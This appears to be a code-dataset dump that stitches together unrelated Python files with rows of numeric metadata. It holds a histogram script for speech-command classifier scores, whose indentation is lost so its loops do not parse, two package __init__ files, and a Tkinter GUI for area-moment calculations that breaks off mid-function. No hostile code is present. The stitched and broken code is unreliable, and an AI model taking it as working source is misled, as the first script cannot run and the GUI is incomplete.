spIn_maOut = np.array([0,0,99.39,0.16,0.83,0,1.8,0,0,0,7.33,0.02,0,0.16,0,3.57,0.01,0,0.03,2.38,0,0,7.23,0,0.07,3.03,0,0,0,0,5.68,2.75,11.46,0,21.75,0,0,17.74,0,0,0.01,88.22,22.57,0,0,0.31,0,0.34,0.01,0,0,1.68,97.55,0,95.8,73.91,1.02,3.91,5.08,17.84,0,0.01,0,0,95.08,98.02,0,13.41,2.92,0,0.06,0,0,0,0,0,0.03,88.04,0,14.3,6.64,0,0.05,99.24,0,0,0,0,0.01,0,6.32,0,20.03,0,0,0,0.02,0,0.07,0,49.24,0,0,23.79,0.11,0,0,23.27,82.41,0,33.08,4.71,0,2.6,0.31,0.15,0.01,0,0,98.89,1.65,0,0,0.25,0.02,0,0,0,0,0,0,1.51,0,0.01,87.86,0,0,28.95,0,0.04,0,0.33,0.02,0,0.81,2.94,2.58,13.27,44.76,64.77,0,0,0,0,85.43,0,0,0.11,0,0.13,0,0,0,0,0.01,0,0,0,0.08,29.71,0,0,0,0.02,0.89,0,0,0,0.02,42.68,1.24,7.68,98.12,0.31,0.04,0.26,0.99,3.97,40.28,0,0,99.23,0,0,0,84.96,0,52.66,0,3.1,0,0.32,0,34.48,0,0.97,5.13,0,1.67,0.76,0.1,0,95.19,0,0,4.81,0.49,0.08,0,0,0,0,3.09,0.01,95.69,100,7.61,0,1.44,0,0,0,100,0,43.11,0,0,0,0,2.02,95.36,65.45,0.29,0.78,27.96,0.08,2.51,0,0,0,3.49,92.42,0.04,0,0.04,0,99.31,0,0.26,99.34,0.01,0,0.19,0,99.96,0,0,0,0.01,0.46,42.77,0.29,0,0.03,0,0.06,92.99,0,0,0,0.29,0,0,0,1.12,1.69,0.11,0,1.27,0.04,0,0.01,0.18,0,0.01,0.14,0.02,0.46,0,7.62])
#output
spIn_stOut = np.array([0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0.38,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,98.82,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0.08,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,])
verteilungSP = [0]*10
verteilungMA = [0]*10
verteilungST = [0]*10
#sp_out verteilung
for i in spIn_spOut:
if i <= 10:
verteilungSP[0]+=1
elif i <= 20 and i >10:
verteilungSP[1]+=1
elif i <= 30 and i >20:
verteilungSP[2]+=1
elif i <= 40 and i >30:
verteilungSP[3]+=1
elif i <= 50 and i >40:
verteilungSP[4]+=1
elif i <= 60 and i >50:
verteilungSP[5]+=1
elif i <= 70 and i >60:
verteilungSP[6]+=1
elif i <= 80 and i >70:
verteilungSP[7]+=1
elif i <= 90 and i >80:
verteilungSP[8]+=1
elif i <= 100 and i >90:
verteilungSP[9]+=1
#ma_out verteilung
for i in spIn_maOut:
if i <= 10:
verteilungMA[0]+=1
elif i <= 20 and i >10:
verteilungMA[1]+=1
elif i <= 30 and i >20:
verteilungMA[2]+=1
elif i <= 40 and i >30:
verteilungMA[3]+=1
elif i <= 50 and i >40:
verteilungMA[4]+=1
elif i <= 60 and i >50:
verteilungMA[5]+=1
elif i <= 70 and i >60:
verteilungMA[6]+=1
elif i <= 80 and i >70:
verteilungMA[7]+=1
elif i <= 90 and i >80:
verteilungMA[8]+=1
elif i <= 100 and i >90:
verteilungMA[9]+=1
#st_out verteilung
for i in spIn_stOut:
if i <= 10:
verteilungST[0]+=1
elif i <= 20 and i >10:
verteilungST[1]+=1
elif i <= 30 and i >20:
verteilungST[2]+=1
elif i <= 40 and i >30:
verteilungST[3]+=1
elif i <= 50 and i >40:
verteilungST[4]+=1
elif i <= 60 and i >50:
verteilungST[5]+=1
elif i <= 70 and i >60:
verteilungST[6]+=1
elif i <= 80 and i >70:
verteilungST[7]+=1
elif i <= 90 and i >80:
verteilungST[8]+=1
elif i <= 100 and i >90:
verteilungST[9]+=1
labels = ["0-10","10-20","20-30","30-40","40-50","50-60","60-70","70-80","80-90","90-100"]
X = np.arange(10)
fig,axs = plt.subplots(1,3)
fig.suptitle("Ergebnisverteilung Tensorflow",fontsize="xx-large")
axs[0].set_title("Input = Sprache")
axs[0].set_xlabel("Ergebnis in %",fontsize="large")
axs[0].set_ylabel("Sampleanzahl",fontsize="large")
axs[0].bar(x = X+0,height = verteilungSP,width=0.25,color = "b",label = "Output = Sprache")
axs[0].bar(x = X+0.25,height = verteilungMA,width=0.25,color = "g",label = "Output = Marvin Go")
axs[0].bar(x = X+0.5,height = verteilungST,width=0.25,color = "r",label = "Output = Stille")
axs[0].legend()
axs[0].yaxis.grid(True,linestyle = "--")
axs[0].set_xticks(X+0.25)
axs[0].set_xticklabels(labels)
plt.show()
| 63.287234
| 1,510
| 0.598588
| 1,671
| 5,949
| 2.122681
| 0.104129
| 0.22216
| 0.282492
| 0.346208
| 0.304483
| 0.254299
| 0.214548
| 0.199323
| 0.084297
| 0.084297
| 0
| 0.429634
| 0.118507
| 5,949
| 94
| 1,511
| 63.287234
| 0.246758
| 0.016978
| 0
| 0.348837
| 0
| 0
| 0.032694
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.023256
| 0
| 0.023256
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
aa3291961d339bf3f36ba9930ba1afc2e04fd818
| 130
|
py
|
Python
|
src/mbed_cloud/update/__init__.py
|
GQMai/mbed-cloud-sdk-python
|
76ef009903415f37f69dcc5778be8f5fb14c08fe
|
[
"Apache-2.0"
] | 12
|
2017-12-28T11:18:43.000Z
|
2020-10-04T12:11:15.000Z
|
src/mbed_cloud/update/__init__.py
|
GQMai/mbed-cloud-sdk-python
|
76ef009903415f37f69dcc5778be8f5fb14c08fe
|
[
"Apache-2.0"
] | 50
|
2017-12-21T12:50:41.000Z
|
2020-01-13T16:07:08.000Z
|
src/mbed_cloud/update/__init__.py
|
GQMai/mbed-cloud-sdk-python
|
76ef009903415f37f69dcc5778be8f5fb14c08fe
|
[
"Apache-2.0"
] | 8
|
2018-04-25T17:47:29.000Z
|
2019-08-29T06:38:27.000Z
|
from .update import Campaign
from .update import FirmwareImage
from .update import FirmwareManifest
from .update import UpdateAPI
| 26
| 36
| 0.846154
| 16
| 130
| 6.875
| 0.4375
| 0.363636
| 0.581818
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.123077
| 130
| 4
| 37
| 32.5
| 0.964912
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
aa3903c4887534a8e602fdb06f758f0789beefcd
| 863
|
py
|
Python
|
venv/lib/python3.9/site-packages/py2app/recipes/__init__.py
|
dequeb/asmbattle
|
27e8b209de5787836e288a2f2f9b7644ce07563e
|
[
"MIT"
] | null | null | null |
venv/lib/python3.9/site-packages/py2app/recipes/__init__.py
|
dequeb/asmbattle
|
27e8b209de5787836e288a2f2f9b7644ce07563e
|
[
"MIT"
] | null | null | null |
venv/lib/python3.9/site-packages/py2app/recipes/__init__.py
|
dequeb/asmbattle
|
27e8b209de5787836e288a2f2f9b7644ce07563e
|
[
"MIT"
] | null | null | null |
from . import PIL # noqa: F401
from . import automissing # noqa: F401
from . import autopackages # noqa: F401
from . import ctypes # noqa: F401
from . import docutils # noqa: F401
from . import ftplib # noqa: F401
from . import lxml # noqa: F401
from . import matplotlib # noqa: F401
from . import pydoc # noqa: F401
from . import pyenchant # noqa: F401
from . import pygame # noqa: F401
from . import pyopengl # noqa: F401
from . import pyside # noqa: F401
from . import pyside2 # noqa: F401
from . import qt5 # noqa: F401
from . import setuptools # noqa: F401
from . import shiboken2 # noqa: F401
from . import sip # noqa: F401
from . import six # noqa: F401
from . import sysconfig_module # noqa: F401
from . import tkinter # noqa: F401
from . import virtualenv # noqa: F401
from . import wx # noqa: F401
from . import xml # noqa: F401
| 34.52
| 44
| 0.69409
| 121
| 863
| 4.942149
| 0.239669
| 0.401338
| 0.461538
| 0.692308
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.111773
| 0.22248
| 863
| 24
| 45
| 35.958333
| 0.779434
| 0.304751
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
aa48765843a3f020782cb9ca5aa79708b14245fa
| 69,849
|
py
|
Python
|
CalcGUI/MainWindow.py
|
AMSZ-BMEGPK/Aream
|
0573ef9a9380a239f26da05d7a7422940d038884
|
[
"MIT"
] | null | null | null |
CalcGUI/MainWindow.py
|
AMSZ-BMEGPK/Aream
|
0573ef9a9380a239f26da05d7a7422940d038884
|
[
"MIT"
] | null | null | null |
CalcGUI/MainWindow.py
|
AMSZ-BMEGPK/Aream
|
0573ef9a9380a239f26da05d7a7422940d038884
|
[
"MIT"
] | null | null | null |
from ast import Return
import webbrowser
import tkinter as tk
from tkinter import BooleanVar, Toplevel, ttk
from tkinter.constants import BOTH
from PIL import Image, ImageTk
from PIL import ImageGrab
import CalcFunctions as Calc
import json
from SideMenu import SideMenu
from tkvideo import tkvideo
from PlotFunctions import plot, plot_principal_axes
import shape_builder
from SettingsWindow import settings_window
from ErrorWindow import error_window
from UpdateWindow import update_window
from tkinter.filedialog import asksaveasfile
from tkinter import messagebox
import datetime as dt
from fpdf import FPDF
import numpy as np
import os
from urllib.request import urlopen
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
from matplotlib.figure import Figure
import matplotlib.patches as patches
## ANIMATION WINDOW -----------------------------------------------------------------------------------------------------------------------------------------------------------
class starting_window(tk.Tk):
def __init__(self):
super().__init__()
self.overrideredirect(1)
# Position the window in the center of the page.
positionRight = int(self.winfo_screenwidth()/2 - 240)
positionDown = int(self.winfo_screenheight()/2 - 120)
self.geometry("+{}+{}".format(positionRight, positionDown))
# Play splash screen on tkinter widget
self.splash_image = Image.open("AMSZ_splash.png")
self.splash_image = self.splash_image.resize((480,240), Image.ANTIALIAS)
self.splash_img = ImageTk.PhotoImage(self.splash_image)
my_label = tk.Label(self, image = self.splash_img)
my_label.pack()
self.after(1500, lambda: self.destroy())
## MAIN WINDOW -----------------------------------------------------------------------------------------------------------------------------------------------------------
class main_window(tk.Tk):
# def onExit(self):
# self.quit()
def __init__(self):
super().__init__()
# main window opening size
self.win_width = 1301
self.win_height = 750
# Current version
self.version = 1.1
# screen size
self.screen_width = self.winfo_screenwidth()
self.screen_height = self.winfo_screenheight()
# boolean to decide if the window can fit to the screen
self.size_ok = tk.BooleanVar(False)
if self.win_width<self.screen_width/4*3 or self.win_height<self.screen_height/4*3:
self.size_ok.set(True)
# Position the window in the center of the page.
positionRight = int(self.winfo_screenwidth()/2 - self.win_width/2)
positionDown = int(self.winfo_screenheight()/2 - self.win_height/2)
self.geometry("+{}+{}".format(positionRight, positionDown))
# Variables
self.coordinate_on = tk.BooleanVar(False)
self.dimension_lines_on = tk.BooleanVar(False)
self.transformed_coordinate_on = tk.BooleanVar(False)
self.thickness_on = tk.BooleanVar(False)
self.coordinate_on.set(True)
self.dimension_lines_on.set(True)
self.plotted = tk.BooleanVar(False)
self.shape_builder_mode = False
self.window_open = BooleanVar(False)
#self.valid_sol = BooleanVar(False)
# Default unit, default theme
self.unit = settings["default_unit"]#"mm"
self.angle_unit = settings["angle_unit"] #! to settings
self.theme = settings["theme"]#"dark"
self.logo_enabled = settings["logo_enabled"]
#shape builder configuration
self.show_orig_axis = True
self.show_orig_axis_bool = tk.BooleanVar()
self.show_orig_axis_bool.set(self.show_orig_axis)
self.orig_axis_dissapier = False
self.orig_axis_dissapier_bool = tk.BooleanVar()
self.orig_axis_dissapier_bool.set(self.orig_axis_dissapier)
self.sb_ha_vis = True #visualizing hauptachsen in sb mode
self.sb_ha_vis_bool = tk.BooleanVar()
self.sb_ha_vis_bool.set(self.sb_ha_vis)
self.calc_for_orig_axis = False
self.calc_for_orig_axis_bool = tk.BooleanVar()
self.calc_for_orig_axis_bool.set(self.calc_for_orig_axis)
# Play AMSZ logo on startup
self.play_logo = tk.BooleanVar(False)
if self.logo_enabled == 'True':
self.play_logo.set(True)
else:
self.play_logo.set(False)
# Colors
if self.theme == "dark":
self.colors = DARK_THEME
else:
self.colors = LIGHT_THEME
## Window -------------------------------------------------------------------------------------------------------------------------------------------------------------------
self.title(f"Aream {self.version}")
if self.size_ok.get() == False:
self.state("zoomed") # Fullscreen
self.geometry(f"{self.win_width}x{self.win_height}")
self.configure(bg=self.colors['main_color'])
self.minsize(width=200, height=200)
self.tk.call('wm', 'iconphoto', self._w, tk.PhotoImage(file='logo_A.png'))
# self.iconbitmap("AMSZ.ico")
self.menu_is_on = False
self.create_menubar(self.shape_builder_mode, self.menu_is_on)
# Canvas for drawing
self.canvas = None
# Side Menu
self.sm = SideMenu(self)
self.sm.pack(side=tk.LEFT, padx = (20,10), pady = 20, fill=tk.Y)
# self.sm.pack(side=tk.LEFT, fill=tk.Y)
# angle_unit on pressing enter
self.bind('<Return>', self.calculate)
plot(self, None, False, False, False, False, self.colors, self.angle_unit)
# Checking for updates
url = "https://www.mm.bme.hu/amsz/index.php/python-masodrendu-nyomatek-szamito-felulet/"
page = urlopen(url)
html_bytes = page.read()
html = html_bytes.decode("utf-8")
s = str(html)
index = s.find("Legújabb verzió: ")
index_after = s.find("<br>", index, index+50)
index_version = index + 17
latest_version = s[index_version:index_after]
latest_version = float(latest_version)
if latest_version != self.version:
update_window(self)
## USEFUL FUNCTIONS -----------------------------------------------------------------------------------------------------------------------------------------------------------
def feedback(self):
webbrowser.open("https://forms.gle/gMP69MTgbtey9T5V8")
def help(self):
webbrowser.open("https://www.mm.bme.hu/amsz/index.php/python-masodrendu-nyomatek-szamito-felulet/")
def create_menubar(self, shape_builder_mode, menu_is_on):
if menu_is_on == True:
self.menu_canvas.pack_forget()
else:
self.menu_is_on = True
## custom menubar -----------------------------------------------------------------------------------------------------------------------------------------------------------
self.menu_canvas = tk.Canvas(self, bg=self.colors['secondary_color'], highlightthickness=0, height=26)
self.menu_canvas.pack(fill = tk.X)
# custom menubar objects
self.sol_save_button_img = tk.PhotoImage(file=f"{self.colors['path']}menubar/sol_save.png")
self.sol_save_button_hover_img = tk.PhotoImage(file=f"{self.colors['path']}menubar/sol_save_hover.png")
self.sol_save_button = self.menu_canvas.create_image(0,0,anchor=tk.NW,image=self.sol_save_button_img)
self.menu_canvas.tag_bind(self.sol_save_button, '<Button-1>', lambda e: self.save_file())
self.menu_canvas.tag_bind(self.sol_save_button, '<Enter>', lambda e:self.menu_canvas.itemconfig(self.sol_save_button,
image=self.sol_save_button_hover_img))
self.menu_canvas.tag_bind(self.sol_save_button, '<Leave>', lambda e:self.menu_canvas.itemconfig(self.sol_save_button,
image=self.sol_save_button_img))
self.setting_button_img = tk.PhotoImage(file=f"{self.colors['path']}menubar/settings.png")
self.setting_button_hover_img = tk.PhotoImage(file=f"{self.colors['path']}menubar/settings_hover.png")
self.setting_button = self.menu_canvas.create_image(167,0,anchor=tk.NW,image=self.setting_button_img)
self.menu_canvas.tag_bind(self.setting_button, '<Button-1>', lambda e: settings_window(self))
self.menu_canvas.tag_bind(self.setting_button, '<Enter>', lambda e:self.menu_canvas.itemconfig(self.setting_button,
image=self.setting_button_hover_img))
self.menu_canvas.tag_bind(self.setting_button, '<Leave>', lambda e:self.menu_canvas.itemconfig(self.setting_button,
image=self.setting_button_img))
self.basic_button_img = tk.PhotoImage(file=f"{self.colors['path']}/menubar/basic.png")
self.basic_button_hover_img = tk.PhotoImage(file=f"{self.colors['path']}/menubar/basic_hover.png")
self.change_button_img = tk.PhotoImage(file=f"{self.colors['path']}menubar/change.png")
self.change_button_hover_img = tk.PhotoImage(file=f"{self.colors['path']}menubar/change_hover.png")
self.change_button = self.menu_canvas.create_image(261,0,anchor=tk.NW,image=self.change_button_img)
self.menu_canvas.tag_bind(self.change_button, '<Button-1>', lambda e: self.build_shape())
self.menu_canvas.tag_bind(self.change_button, '<Enter>', lambda e:self.menu_canvas.itemconfig(self.change_button,
image=self.change_button_hover_img))
self.menu_canvas.tag_bind(self.change_button, '<Leave>', lambda e:self.menu_canvas.itemconfig(self.change_button,
image=self.change_button_img))
if shape_builder_mode == False:
forms_posx = 167 + 94 + 104
help_posx = 167 + 94 + 104 + 97
else:
forms_posx = 167 + 94 + 118
help_posx = 167 + 94 + 118 + 97
self.forms_button_img = tk.PhotoImage(file=f"{self.colors['path']}menubar/forms.png")
self.forms_button_hover_img = tk.PhotoImage(file=f"{self.colors['path']}menubar/forms_hover.png")
self.forms_button = self.menu_canvas.create_image(forms_posx,0,anchor=tk.NW,image=self.forms_button_img)
self.menu_canvas.tag_bind(self.forms_button, '<Button-1>', lambda e: self.feedback())
self.menu_canvas.tag_bind(self.forms_button, '<Enter>', lambda e:self.menu_canvas.itemconfig(self.forms_button,
image=self.forms_button_hover_img))
self.menu_canvas.tag_bind(self.forms_button, '<Leave>', lambda e:self.menu_canvas.itemconfig(self.forms_button,
image=self.forms_button_img))
self.help_button_img = tk.PhotoImage(file=f"{self.colors['path']}menubar/help.png")
self.help_button_hover_img = tk.PhotoImage(file=f"{self.colors['path']}menubar/help_hover.png")
self.help_button = self.menu_canvas.create_image(help_posx,0,anchor=tk.NW,image=self.help_button_img)
self.menu_canvas.tag_bind(self.help_button, '<Button-1>', lambda e: self.help())
self.menu_canvas.tag_bind(self.help_button, '<Enter>', lambda e:self.menu_canvas.itemconfig(self.help_button,
image=self.help_button_hover_img))
self.menu_canvas.tag_bind(self.help_button, '<Leave>', lambda e:self.menu_canvas.itemconfig(self.help_button,
image=self.help_button_img))
def theme_change(self, theme):
if self.theme != theme:
self.theme=theme
if self.theme=="dark":
self.colors=DARK_THEME
self.sm.change_color(DARK_THEME)
# if self.plotted==True:
# plot(self, self.sm.shape, self.coordinate_on.get(), self.dimension_lines_on.get(), self.transformed_coordinate_on.get(), self.thickness_on.get(), self.colors)
elif self.theme == "light":
self.colors=LIGHT_THEME
self.sm.change_color(LIGHT_THEME)
# if self.plotted==True:
# plot(self, self.sm.shape, self.coordinate_on.get(), self.dimension_lines_on.get(), self.transformed_coordinate_on.get(), self.thickness_on.get(), self.colors)
else:
print("ERROR: Unknown Theme")
return -1
self.configure(bg=self.colors['main_color'])
settings['theme']=self.theme
self.destroy()
self.__init__()
#TODO: canvas color???? + plot
print(f"Theme set to {theme}")
def unit_change(self, unit_type, unit):
if unit_type == "degree":
self.angle_unit = unit
else:
self.unit = unit
for i in self.sm.controls:
if i["unit_type"] == unit_type:
i["unit"].config(text = unit)
try:
for i in self.sb.controls:
if i["unit_type"] == unit_type:
i["unit"].config(text = unit)
except:
None
def build_shape(self):
if not self.shape_builder_mode:
print("opening sb")
self.shape_builder_mode = True
self.create_menubar(self.shape_builder_mode, self.menu_is_on)
self.sm.pack_forget()
self.sb_sm = shape_builder.sb_side_menu(self)
self.sb_sm.pack(side=tk.LEFT, fill=tk.Y, padx = (20,10), pady = 20)
self.sb = shape_builder.shapeBuilder(self, self.sb_sm)
self.change_button_img = tk.PhotoImage(file=f"{self.colors['path']}menubar/basic.png")
self.change_button_hover_img = tk.PhotoImage(file=f"{self.colors['path']}menubar/basic_hover.png")
self.menu_canvas.itemconfig (self.change_button, image=self.change_button_img)
if self.plotted==True:
self.canvas._tkcanvas.destroy()
self.sb.pack(expand=tk.YES, fill=tk.BOTH, padx = (10,20), pady = 20)
else:
print("closing sb")
self.sb.pack_forget()
self.sb_sm.pack_forget()
self.shape_builder_mode = False
self.create_menubar(self.shape_builder_mode, self.menu_is_on)
self.sm.pack(side=tk.LEFT, fill=tk.Y, padx = (20,10), pady = 20)
# calling = eval(f'self.sm.{self.sm.shape.lower()}_click')
# calling()
self.sm.combo_clear()
# self.combo_rectangle.grid(row=1, column=0, columnspan=5)
self.sm.combo_default_img = tk.PhotoImage(file=f"{self.colors['path']}combobox/combo_default.png")
self.sm.combo_default = tk.Label(self.sm.canvas, image=self.sm.combo_default_img, bg=self["background"], activebackground=self["background"])
self.sm.combo_default.bind('<Button-1>', func=lambda e:self.sm.combo_click())
self.sm.combo_default.grid(row=1, column=0, columnspan=5)
self.sm.combo_default["border"] = "0"
self.sm.clear()
# self.sm.combo_clear()
# self.sm.combo_rectangle.grid_forget() ## TODO eval func stringet códdá alakít
# self.sm.combo_default.grid(row=1, column=0, columnspan=5)
# self.sm.calling
self.plotted = False
self.sm.shape = None
plot(self, None, False, False, False, False, self.colors, self.angle_unit)
self.change_button_img = tk.PhotoImage(file=f"{self.colors['path']}menubar/change.png")
self.change_button_hover_img = tk.PhotoImage(file=f"{self.colors['path']}menubar/change_hover.png")
self.menu_canvas.itemconfig (self.change_button, image=self.change_button_img)
def choose_object(self, shape = None):
self.dimensions = {
"a": 2,
"b": 1,
"d": 1
}
if shape == self.sm.shape:
return 0
if self.canvas is not None:
self.sm.clear()
if shape == "Rectangle" and self.sm.shape != "Rectangle":
self.sm.shape = "Rectangle"
self.sm.change_to_recrangle()
elif shape == "Circle" and self.sm.shape != "Circle":
self.sm.shape = "Circle"
self.sm.change_to_circle()
elif shape == "Ellipse" and self.sm.shape != "Ellipse":
self.sm.shape = "Ellipse"
self.sm.change_to_ellipse()
elif shape == "Isosceles_triangle" and self.sm.shape != "Isosceles_triangle":
self.sm.shape = "Isosceles_triangle"
self.sm.change_to_isosceles_triangle()
print(self.sm.shape)
elif shape == "Right_triangle" and self.sm.shape != "Right_triangle":
self.sm.shape = "Right_triangle"
self.sm.change_to_right_triangle()
print(self.sm.shape)
else:
self.sm.shape = None
print("Ez az alakzat még nincs definiálva...")
plot(self, self.sm.shape, self.coordinate_on.get(), self.dimension_lines_on.get(), self.transformed_coordinate_on.get(), self.thickness_on.get(), self.colors, self.angle_unit)
def get_entry(self, number_of_entries):
vissza = []
for i in range(number_of_entries):
if i >= 1 and self.sm.shape == "Circle": #! Jujj de csúnya...
i+=1
if self.sm.controls[i]["entry"].get().replace(',','.') == "":
print("Hiba")
self.sm.controls[i]["entry"].config({"background": self.colors['error_color']})
for i in self.sm.indicators:
i.config(text="")
self.sm.result1.config(text="Hiba a bemeneti adatokban!")
vissza.append(None)
elif float(self.sm.controls[i]["entry"].get().replace(',','.')) > 0:
vissza.append(float(self.sm.controls[i]["entry"].get().replace(',','.')))
self.sm.controls[i]["entry"].config({"background": self.colors['entry_color']})
else:
print("Hiba")
self.sm.controls[i]["entry"].config({"background": self.colors['error_color']})
for i in self.sm.indicators:
i.config(text="")
self.sm.result1.config(text="Hiba a bemeneti adatokban!")
vissza.append(None)
if self.transformed_coordinate_on.get():
for i in range(1,4):
if self.sm.shape == "Circle":
i += 1
if self.sm.controls[i]["entry"].get().replace(',','.') == "":
print("Hiba")
self.sm.controls[i]["entry"].config({"background": self.colors['error_color']})
for i in self.sm.indicators:
i.config(text="")
self.sm.result1.config(text="Hiba a bemeneti adatokban!")
vissza.append(None)
else:
vissza.append(float(self.sm.controls[i]["entry"].get().replace(',','.')))
self.sm.controls[i]["entry"].config({"background": self.colors['entry_color']})
if self.sm.shape != "Circle":
i += 1
if self.sm.controls[i]["entry"].get().replace(',','.') == "":
print("Hiba")
self.sm.controls[i]["entry"].config({"background": self.colors['error_color']})
for i in self.sm.indicators:
i.config(text="")
self.sm.result1.config(text="Hiba a bemeneti adatokban!")
vissza.append(None)
else:
vissza.append(float(self.sm.controls[i]["entry"].get().replace(',','.')))
self.sm.controls[i]["entry"].config({"background": self.colors['entry_color']})
if self.thickness_on.get():
if self.sm.shape == "Circle":
print("Kor szamitas")
t = float(self.sm.controls[-1]["entry"].get().replace(',','.'))
d = float(self.sm.controls[0]["entry"].get().replace(',','.'))
if 0 < t < d/2 or t is not None:
print("kor lehetseges")
t = float(self.sm.controls[-1]["entry"].get().replace(',','.'))
self.sm.controls[-1]["entry"].config({"background": self.colors['entry_color']})
else:
print("Hiba")
self.sm.controls[-1]["entry"].config({"background": self.colors['error_color']})
for i in self.sm.indicators:
i.config(text="")
self.sm.result2.config(text="Hiba a falvastagságban!")
vissza.append(None)
t = None
elif self.sm.shape == "Right_triangle":
print("Derekszogu haromszog szamitas")
t = float(self.sm.controls[-1]["entry"].get().replace(',','.'))
a = float(self.sm.controls[0]["entry"].get().replace(',','.'))
b = float(self.sm.controls[1]["entry"].get().replace(',','.'))
phi = np.arctan(b/a)
c = np.sqrt(a**2 + b**2)
print('phi: ' + str(phi*180/np.pi))
print('c: ' + str(c))
s1 = np.sqrt(b**2 + (a/2)**2)
s2 = np.sqrt(a**2 + (c/2)**2 - 2*a*(c/2)*np.cos(phi))
s3 = np.sqrt(a**2 + (b/2)**2)
print('s2: ' + str(s2))
print('s3: ' + str(s3))
t1 = a/3
t2 = b/3
beta = np.arccos( ( (s2/3)**2 - (2*s3/3)**2 - (c/2)**2 ) / ( -2 * (2*s3/3) * (c/2) ) )
print('beta: ' + str(beta))
t3 = (2*s3/3)*np.sin(beta)
print('t1: ' + str(t1))
print('t2: ' + str(t2))
print('t3: ' + str(t3))
# selecting the smallest
t_min = min(t1, t2, t3)
print('legkisebb: ' + str(t_min))
if 0 < t:
try:
t = float(self.sm.controls[-1]["entry"].get().replace(',','.'))
self.sm.controls[-1]["entry"].config({"background": self.colors['entry_color']})
except:
print("Hiba")
self.sm.controls[-1]["entry"].config({"background": self.colors['error_color']})
for i in self.sm.indicators:
i.config(text="")
self.sm.result1.config(text="Hiba a bemeneti adatokban!")
self.sm.result2.config(text="Hiba a falvastagságban!")
vissza.append(None)
t = None
if 0 < t >= t_min:
self.sm.controls[0]["entry"].config({"background": self.colors['error_color']})
self.sm.controls[1]["entry"].config({"background": self.colors['error_color']})
self.sm.controls[-1]["entry"].config({"background": self.colors['error_color']})
for i in self.sm.indicators:
i.config(text="")
self.sm.result1.config(text="Hiba a bemeneti adatokban!")
self.sm.result2.config(text="Hiba a falvastagságban!")
vissza.append(None)
elif self.sm.shape == "Isosceles_triangle":
print("Egyenloszaru haromszog szamitas")
t = float(self.sm.controls[-1]["entry"].get().replace(',','.'))
a = float(self.sm.controls[0]["entry"].get().replace(',','.'))
b = float(self.sm.controls[1]["entry"].get().replace(',','.'))
phi = np.arctan(b/ (a/2))
c = np.sqrt((a/2)**2 + b**2)
print('phi: ' + str(phi*180/np.pi))
print('c: ' + str(c))
s1 = b
s2 = np.sqrt(a**2 + (c/2)**2 - 2*a*(c/2)*np.cos(phi))
s3 = s2
print('s2: ' + str(s2))
print('s3: ' + str(s3))
t1 = a/3
beta = np.arccos( ( (s2/3)**2 - (2*s3/3)**2 - (c/2)**2 ) / ( -2 * (2*s3/3) * (c/2) ) )
print('beta: ' + str(beta))
t2 = (2*s2/3)*np.sin(beta)
t3 =t2
print('t1: ' + str(t1))
print('t2: ' + str(t2))
print('t3: ' + str(t3))
# selecting the smallest
t_min = min(t1, t2, t3)
print('legkisebb: ' + str(t_min))
if 0 < t:
try:
t = float(self.sm.controls[-1]["entry"].get().replace(',','.'))
self.sm.controls[-1]["entry"].config({"background": self.colors['entry_color']})
except:
print("Hiba")
self.sm.controls[-1]["entry"].config({"background": self.colors['error_color']})
for i in self.sm.indicators:
i.config(text="")
self.sm.result1.config(text="Hiba a bemeneti adatokban!")
self.sm.result2.config(text="Hiba a falvastagságban!")
vissza.append(None)
t = None
if 0 < t >= t_min:
self.sm.controls[0]["entry"].config({"background": self.colors['error_color']})
self.sm.controls[1]["entry"].config({"background": self.colors['error_color']})
self.sm.controls[-1]["entry"].config({"background": self.colors['error_color']})
for i in self.sm.indicators:
i.config(text="")
self.sm.result1.config(text="Hiba a bemeneti adatokban!")
self.sm.result2.config(text="Hiba a falvastagságban!")
vissza.append(None)
else:
print("Teglalap szamitas (egyenlore minden mas is)")
try:
t = float(self.sm.controls[-1]["entry"].get().replace(',','.'))
self.sm.controls[-1]["entry"].config({"background": self.colors['entry_color']})
except:
